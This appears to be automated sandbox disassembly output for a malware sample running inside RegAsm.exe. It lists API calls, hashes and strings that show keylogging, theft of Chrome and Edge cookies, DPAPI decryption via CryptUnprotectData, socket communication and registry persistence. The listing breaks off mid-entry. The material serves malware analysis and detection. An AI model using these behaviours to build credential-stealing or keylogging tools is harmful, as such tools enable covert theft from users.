                                                                                  • API String ID: 493641738-0
                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                  • _free.LIBCMT ref: 10009206
                                                                                  • _free.LIBCMT ref: 10009218
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00450A54
                                                                                    • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                  • _free.LIBCMT ref: 00450A66
                                                                                  • _free.LIBCMT ref: 00450A78
                                                                                  • _free.LIBCMT ref: 00450A8A
                                                                                  • _free.LIBCMT ref: 00450A9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                  • _free.LIBCMT ref: 10005381
                                                                                  • _free.LIBCMT ref: 10005394
                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00444106
                                                                                    • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                  • _free.LIBCMT ref: 00444118
                                                                                  • _free.LIBCMT ref: 0044412B
                                                                                  • _free.LIBCMT ref: 0044413C
                                                                                  • _free.LIBCMT ref: 0044414D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                  APIs
                                                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                  • _free.LIBCMT ref: 0044E8D5
                                                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                  • String ID: *?$.
                                                                                  • API String ID: 2812119850-3972193922
                                                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                  APIs
                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00A7EAA8,00000010), ref: 004048E0
                                                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                  • String ID: XQG$NG$PG
                                                                                  • API String ID: 1634807452-3565412412
                                                                                  • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                  • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  • API String ID: 2506810119-1068371695
                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                  • _free.LIBCMT ref: 004435E0
                                                                                  • _free.LIBCMT ref: 004435EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  • API String ID: 2506810119-1068371695
                                                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BAD8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                                                  • API String ID: 368326130-3219657780
                                                                                  • Opcode ID: 37226d653392442eec80b4c6fc6e746d96c897d6e5907c6fdfc71737838009e8
                                                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                  • Opcode Fuzzy Hash: 37226d653392442eec80b4c6fc6e746d96c897d6e5907c6fdfc71737838009e8
                                                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00416330
                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CloseCreateValue
                                                                                  • String ID: !D@$okmode$PG
                                                                                  • API String ID: 3411444782-3370592832
                                                                                  • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                  • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                  APIs
                                                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                  Strings
                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                  • API String ID: 1174141254-1980882731
                                                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                  APIs
                                                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                  Strings
                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                  • API String ID: 1174141254-1980882731
                                                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                  • wsprintfW.USER32 ref: 0040B22E
                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventLocalTimewsprintf
                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                  • API String ID: 1497725170-1359877963
                                                                                  • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                  • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                  APIs
                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                  • String ID: Online Keylogger Started
                                                                                  • API String ID: 112202259-1258561607
                                                                                  • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                  • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                  • API String ID: 2574300362-2380590389
                                                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                  • String ID: Connection Timeout
                                                                                  • API String ID: 2055531096-499159329
                                                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                  • API String ID: 2005118841-1866435925
                                                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                  APIs
                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                  • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                                  • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                                  Strings
                                                                                  Memory Dump Source
